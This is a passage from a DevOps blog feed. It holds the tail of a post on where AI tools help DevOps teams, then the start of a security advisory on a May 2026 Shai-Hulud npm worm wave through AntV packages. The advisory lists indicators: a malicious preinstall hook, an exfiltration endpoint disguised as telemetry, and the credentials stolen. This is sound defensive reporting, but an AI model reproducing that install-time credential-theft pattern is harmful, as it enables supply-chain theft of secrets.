          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Code authoring is the area where AI is most useful and least controversial. Pull-request review, test generation, and dependency upgrade chores are the next layer in.</li>
<li>Observability and incident response are getting natural-language query interfaces faster than the vendors expected. Honeycomb&#39;s MCP server, Datadog&#39;s Bits AI, New Relic&#39;s Grok all work. The deeper bet (autonomous root-cause analysis) is still flaky.</li>
<li>Infrastructure-as-code is the slowest moving area. Terraform&#39;s plan/apply loop punishes hallucinations harder than any other surface in the stack.</li>
<li>Big incumbents move slowly because they own the workflow. A bad AI feature ships to thousands of paying teams and the support tickets compound. Individual engineers move fast because they only have to please themselves.</li>
<li>The single highest-leverage thing for a DevOps engineer to try this week: an MCP server that exposes your own infrastructure (kubectl, terraform state, observability) to your AI assistant of choice. The local connection beats every SaaS AIOps tool we have tried.</li>
</ul>
<h2 id="h2-what-has-actually-changed-for-devops-engineers" class="group relative scroll-mt-24">
        <a href="#h2-what-has-actually-changed-for-devops-engineers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What has actually changed for DevOps engineers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-has-actually-changed-for-devops-engineers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Five concrete shifts you can see in the work right now. None of them are speculative.</p>
<h3 id="h3-1-code-authoring-is-solved-enough-that-nobody-talks-about-it" class="group relative scroll-mt-24">
        <a href="#h3-1-code-authoring-is-solved-enough-that-nobody-talks-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          1. Code authoring is solved enough that nobody talks about it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-1-code-authoring-is-solved-enough-that-nobody-talks-about-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Two years ago, GitHub Copilot was the headline. Today nobody at a DevOps conference mentions it because everyone has it. The question is no longer &quot;will AI write code for me&quot; but &quot;which AI, in which IDE, with what context window.&quot; Claude Code, Cursor, Windsurf, Zed, JetBrains AI Assistant, Aider, Continue all do credible work on Terraform modules, Helm charts, GitHub Actions workflows, and Bash scripts. The differentiator is now the editor experience and the size of the context window, not whether the suggestions are good.</p>
<p>The interesting failure mode: AI is fine at writing the next function. It is bad at writing the next module if &quot;next module&quot; requires holding the system architecture in working memory. A senior engineer&#39;s job has not moved much; the boilerplate has moved a lot.</p>
<h3 id="h3-2-pull-request-review-is-the-next-surface-and-it-is-messy" class="group relative scroll-mt-24">
        <a href="#h3-2-pull-request-review-is-the-next-surface-and-it-is-messy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          2. Pull-request review is the next surface, and it is messy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-2-pull-request-review-is-the-next-surface-and-it-is-messy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Three patterns are competing:</p>
<ul>
<li><strong>Vendor agents.</strong> GitHub Copilot Code Review, GitLab Duo, CodeRabbit. These plug into the PR, leave comments, sometimes suggest patches. Quality varies. The honest take is that they catch a lot of style nits and miss most architectural issues, which is the inverse of what you want.</li>
<li><strong>Self-hosted agents.</strong> A 200-line script that calls Claude with the diff and a project-specific prompt, posted as a check via the GitHub API. Several engineers we know are running these against their own repos. Hit rate is higher than vendor tools because the prompt is tuned to the codebase. Maintenance overhead is real.</li>
<li><strong>PR-triggered agentic workflows.</strong> Devin, OpenHands, Claude Code in headless mode. Pick up a PR, run the tests, push a fix commit if a failure looks recoverable. Works for small classes of bug (linting, type errors). Falls over on anything that requires judgement.</li>
</ul>
<p>Nobody has the answer yet. The space is moving fast enough that what we wrote three months ago is already stale. If you are picking one to evaluate this quarter, the self-hosted script gives you the cleanest mental model of what AI is actually doing on your codebase.</p>
<h3 id="h3-3-observability-is-getting-a-natural-language-interface-fast" class="group relative scroll-mt-24">
        <a href="#h3-3-observability-is-getting-a-natural-language-interface-fast" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          3. Observability is getting a natural-language interface, fast
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-3-observability-is-getting-a-natural-language-interface-fast"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Datadog Bits AI, New Relic Grok, Honeycomb&#39;s MCP server, Grafana&#39;s natural-language query feature in Loki, Splunk SPL2 with AI assists. The pattern is the same: type a question in English, get a query in the vendor&#39;s DSL plus the result. It works because the search surface is well-defined and bounded. A bad PromQL query returns no rows; a bad Terraform plan can destroy production.</p>
<p>The harder bet from the same vendors is &quot;AI-driven root cause analysis.&quot; The marketing claims are aggressive. The reality, when we have run the products on real incidents, is that they are good at correlating signals and bad at picking the load-bearing one. Useful as a second opinion. Not yet a replacement for an experienced engineer reading the same dashboards.</p>
<h3 id="h3-4-dependency-management-is-being-eaten-by-agents" class="group relative scroll-mt-24">
        <a href="#h3-4-dependency-management-is-being-eaten-by-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          4. Dependency management is being eaten by agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-4-dependency-management-is-being-eaten-by-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Dependabot was the start. The current wave is more ambitious: an agent that runs the upgrade, reads the changelog, updates the calling code, runs the tests, and opens the PR with a summary of what changed. RenovateBot has supported this shape for a while; what is new is that the LLM step in the middle is now reliable enough to ship.</p>
<p>Individual engineers are running this on Tuesday afternoons against their own monorepos. The vendors are catching up. GitHub Copilot now has a &quot;fix the failing PR&quot; mode that does roughly this; Mend, Snyk, and JFrog have variants.</p>
<p>What still does not work well: major-version upgrades that change semantics. The LLM does not know whether <code>removed deprecated foo()</code> means &quot;delete the call&quot; or &quot;migrate to bar().&quot; Senior judgement still wins here.</p>
<h3 id="h3-5-incident-response-is-the-loudest-but-the-slowest" class="group relative scroll-mt-24">
        <a href="#h3-5-incident-response-is-the-loudest-but-the-slowest" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          5. Incident response is the loudest, but the slowest
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-5-incident-response-is-the-loudest-but-the-slowest"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The pitches: an AI agent that auto-pages, summarises the incident, drafts the postmortem, suggests the fix, runs the rollback. Several vendors sell this story. Cortex, PagerDuty, Rootly, FireHydrant, Incident.io all have an AI feature.</p>
<p>What actually ships well today is the boring part: the summary. Take 30 minutes of Slack messages and produce a five-bullet recap that the incident commander can paste into the postmortem template. Good models do this reliably. Vendors do it. Any engineer with a Claude API key does it for free.</p>
<p>What does not ship well is the action. An AI suggesting &quot;roll back deployment X&quot; is fine. An AI executing the rollback against production needs a level of confidence we do not have yet, and the engineering teams we trust are not letting AI write to prod systems without a human in the loop. That layer of the pitch is still aspirational.</p>
<h2 id="h2-what-has-not-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-has-not-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What has not changed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-has-not-changed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Infrastructure-as-code is the surface where AI has had the least real impact. The reasons are honest:</p>
<ul>
<li>A Terraform plan is unforgiving. A hallucinated resource is a 500-line diff at apply time. Even if the engineer catches it, the trust cost is real.</li>
<li>State is hard to read. The LLM does not know what is in your remote state file unless you give it. Many tools cannot give it because the state has secrets in it.</li>
<li>Module conventions are project-specific. The &quot;right&quot; way to write a Terraform module varies by org, and the LLM cannot infer it from the public docs.</li>
</ul>
<p>There are early attempts (Pulumi Copilot, HashiCorp&#39;s Terraform AI features, atmos with AI assists) but none of them have produced the &quot;wow&quot; moment that pair-programming with Claude Code has for application code. The terraform plan loop punishes mistakes harder than any other tool in the DevOps stack, which is exactly why the LLMs struggle there.</p>
<p>Secrets management, kernel-level tooling (eBPF, kprobes), and database schema migrations are in the same bucket. AI assists at the margins; the load-bearing decisions are still human.</p>
<h2 id="h2-why-the-big-vendors-are-moving-slowly" class="group relative scroll-mt-24">
        <a href="#h2-why-the-big-vendors-are-moving-slowly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the big vendors are moving slowly
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-the-big-vendors-are-moving-slowly"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the question the snippet that inspired this post got right. GitHub does not ship a half-broken AI feature because their userbase is too large to absorb the support burden of a regression. Datadog does not auto-route alerts via an LLM because a single false negative in a production incident becomes a customer-leaving event. HashiCorp does not auto-write Terraform plans because the plan is the last line of defense between an engineer and an outage.</p>
<p>The economics are asymmetric. A vendor that ships a great AI feature gets a press cycle. A vendor that ships a bad one loses three of its biggest customers. So they ship slowly, in betas, with opt-in flags, behind feature toggles.</p>
<p>This is rational for them. It also leaves a gap that the engineers running real stacks are filling.</p>
<h2 id="h2-what-engineers-are-doing-that-vendors-are-not" class="group relative scroll-mt-24">
        <a href="#h2-what-engineers-are-doing-that-vendors-are-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What engineers are doing that vendors are not
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-engineers-are-doing-that-vendors-are-not"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The shape that matters: engineers build narrow, opinionated tools for their specific stack. A vendor ships something general for everyone. The narrow one is more useful to the team that built it. Examples we have seen in the last six months:</p>
<ul>
<li><strong>A kubectl wrapper that pipes commands and output to Claude with a prompt about the cluster&#39;s deployment conventions.</strong> Replaces the &quot;ask the senior engineer what to do&quot; Slack message for routine debugging.</li>
<li><strong>A pre-commit hook that runs the diff through a local model and refuses to commit if it spots a likely secret leak.</strong> The local model is small; the false-positive rate is high but acceptable when the alternative is committing an AWS key.</li>
<li><strong>A Slack bot that watches incident channels, drafts a postmortem skeleton when the channel goes quiet for 30 minutes, and pings the IC to review.</strong> Saves two hours of writing per incident.</li>
<li><strong>A custom MCP server that exposes Prometheus, the cluster&#39;s events API, and the deployment history to Claude Code.</strong> The engineer asks &quot;why is this pod restarting?&quot; and the model runs the queries it needs. This is what Datadog and New Relic are trying to sell, but built on top of the open standards in 45 minutes.</li>
<li><strong>A nightly job that runs a model against the last day&#39;s CI failures and groups them by likely cause.</strong> Replaces the &quot;is this a known flake?&quot; triage question.</li>
</ul>
<p>None of these are products. All of them are 200-line scripts an engineer wrote in an afternoon. Cumulatively, they are doing more for the day-to-day of a DevOps team than any vendor announcement we have seen this year.</p>
<h2 id="h2-where-to-start-this-week" class="group relative scroll-mt-24">
        <a href="#h2-where-to-start-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to start this week
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-to-start-this-week"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you have not built anything AI-shaped into your workflow yet, pick one of these. They are ordered by impact-to-effort ratio.</p>
<ol>
<li><strong>Run Claude Code (or Cursor, or Aider) against your infrastructure repos.</strong> Not for new code; for reading. Ask it to summarise a Terraform module you did not write. Ask it to map the data flow through your Helm chart. The &quot;explain this codebase to me&quot; use case is the most underrated AI application in DevOps.</li>
<li><strong>Wire one MCP server.</strong> The Anthropic Model Context Protocol now has servers for kubectl, GitHub, Prometheus, Loki, Postgres, and most of the tools you already use. Connecting Claude to your own infra (read-only) takes 20 minutes and immediately makes the rest of this list 10x more useful.</li>
<li><strong>Pick one chore and write a script.</strong> Dependency triage, PR summarisation, incident notes, on-call schedule rotation explainers. Whatever takes 30 minutes of your week and is mostly the same each time. A 200-line wrapper around an LLM API will replace it for a one-time cost.</li>
<li><strong>Set up a self-hosted PR review agent.</strong> Not a vendor product. A script. Tune the prompt to your codebase&#39;s conventions. Run it as a GitHub Actions check. Iterate weekly.</li>
</ol>
<h2 id="h2-where-not-to-start-this-week" class="group relative scroll-mt-24">
        <a href="#h2-where-not-to-start-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where not to start this week
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-not-to-start-this-week"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Equally important. These are the corners where the hype is well ahead of the substance, and you will burn time you do not get back.</p>
<ul>
<li><strong>&quot;AI ops platforms&quot; that promise auto-remediation against production.</strong> The good ones do not actually do this; the marketing implies they do. Read the docs carefully.</li>
<li><strong>LLMs in the critical path of a deployment pipeline.</strong> A flaky model becomes a flaky deploy. Use AI to suggest, not to gate.</li>
<li><strong>Custom training on your incident data, hoping for &quot;predictive AIOps.&quot;</strong> The dataset is too small. The signal is too noisy. Three years from now this might work; today it does not.</li>
<li><strong>Replacing a senior engineer with an agent.</strong> No vendor sells this in those words, but several pitches imply it. The senior engineer&#39;s judgement on what to do with the LLM&#39;s output is the load-bearing piece.</li>
</ul>
<h2 id="h2-what-the-next-year-probably-looks-like" class="group relative scroll-mt-24">
        <a href="#h2-what-the-next-year-probably-looks-like" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the next year probably looks like
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-next-year-probably-looks-like"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A short list of predictions, marked clearly as predictions:</p>
<ul>
<li>The PR review surface will get a clear winner. Either GitHub Copilot Code Review levels up enough to be the default, or one of the agent startups (Greptile, CodiumAI, Sweep, others) wins on quality.</li>
<li>MCP becomes standard. The protocol is the right shape, the vendors are adopting it, and the network effect compounds with every new server.</li>
<li>Terraform gets an &quot;AI plan summary&quot; feature from HashiCorp. It will explain what an apply will change in English. It will not write the apply for you. That is the right balance.</li>
<li>One major outage will be partially-attributed-to-AI in its postmortem. It will become a case study. We will all learn from it.</li>
<li>The vendors will catch up. By mid-2027, the gap between &quot;what your custom 200-line script does&quot; and &quot;what your platform vendor ships&quot; will be much smaller than it is today.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>AI is reshaping DevOps. Not evenly. Code authoring and observability querying are the surfaces moving fastest. Infrastructure-as-code, secret management, and autonomous remediation are the surfaces moving slowest, for honest reasons. The big vendors are moving carefully because the downside of a wrong move is large; the individual engineers are moving fast because their downside is just an afternoon.</p>
<p>If you are in DevOps and you have not yet built an AI-shaped tool of your own into your workflow, this week is the right time. The bar to ship something useful has never been lower. The thing you build for yourself today is the thing your vendor will sell back to you in two years. Get ahead of it.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AntV npm Compromise: The Shai-Hulud Worm Comes for Your Dashboards (May 19, 2026)]]></title>
      <link>https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026</link>
      <description><![CDATA[A new Shai-Hulud wave landed at 01:56 UTC on May 19 and rode the @antv maintainer account through 323 packages including echarts-for-react. Here is what got published, what it steals, and the lockfile grep that tells you if you are exposed.]]></description>
      <pubDate>Tue, 19 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[npm]]></category><category><![CDATA[Security]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category>
      <content:encoded><![CDATA[<p>A new wave of the Shai-Hulud worm hit npm at 01:56 UTC on May 19, 2026. This time the carrier was the <code>atool</code> maintainer account, which has publish rights across the AntV data-visualization ecosystem and a handful of downstream packages. Inside an hour the attacker pushed malicious versions of <code>@antv/g2</code>, <code>@antv/g6</code>, <code>@antv/x6</code>, <code>@antv/l7</code>, <code>@antv/s2</code>, <code>@antv/f2</code>, <code>@antv/g</code>, <code>@antv/g2plot</code>, <code>@antv/graphin</code>, <code>@antv/data-set</code>, plus the chart-glue libraries <code>echarts-for-react</code> (1.1M weekly downloads), <code>timeago.js</code>, <code>size-sensor</code>, and <code>canvas-nest.js</code>. Socket counted 639 compromised package versions across 323 unique packages in the burst, and 1,055 versions across 502 packages when you stack it on the broader campaign.</p>
<p>If your stack pulls any of these, even transitively, the payload runs at install time and exfiltrates whatever CI tokens, cloud credentials, and SSH keys the runner can see. This post is the short, practical version: what shipped, what it does, the one-liner grep that tells you if you are exposed, and the order to rotate secrets if you were.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>New Shai-Hulud wave on May 19, 2026. Same worm family as the earlier TanStack and PyTorch Lightning incidents, different namespace and a fresh C2.</li>
<li>Compromised maintainer: <code>atool</code> on npm. AntV namespace plus <code>echarts-for-react</code>, <code>timeago.js</code>, <code>size-sensor</code>, <code>canvas-nest.js</code>, packages under <code>@lint-md/</code>, <code>@openclaw-cn/</code>, and <code>@starmind/</code>.</li>
<li>Trigger: <code>&quot;preinstall&quot;: &quot;bun run index.js&quot;</code> in the package.json. Runs the moment your CI installs.</li>
<li>Exfil destination: <code>t.m-kosche.com:443/api/public/otel/v1/traces</code> over HTTPS, AES-256-GCM payload with RSA-OAEP key wrapping. Looks like an OpenTelemetry traces submission.</li>
<li>Targets GitHub tokens, npm tokens, AWS keys, Kubernetes service-account tokens, Vault tokens, SSH keys, Docker auth files, database connection strings.</li>
<li>Creates a repository under the victim GitHub account named <code>&lt;dune-word&gt;-&lt;dune-word&gt;-&lt;digits&gt;</code> (e.g., <code>sayyadina-stillsuit-852</code>) and uploads stolen data as <code>results/results-&lt;timestamp&gt;-&lt;counter&gt;.json</code>. Marker string in commits: <code>niagA oG eW ereH :duluH-iahS</code>.</li>
<li>If your lockfile mentions any of the named packages with a version published between 01:56 and 02:56 UTC on May 19, treat the host that installed it as compromised and rotate everything in scope.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A Node.js / npm / pnpm / Yarn / Bun project (or a CI pipeline that installs Node packages).</li>
<li>5 minutes to grep your lockfiles.</li>
<li>Access to rotate the credentials in your CI environment (npm tokens, GitHub Actions secrets, cloud IAM keys).</li>
</ul>
<h2 id="h2-what-changed-in-this-wave" class="group relative scroll-mt-24">
        <a href="#h2-what-changed-in-this-wave" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What changed in this wave
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-changed-in-this-wave"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
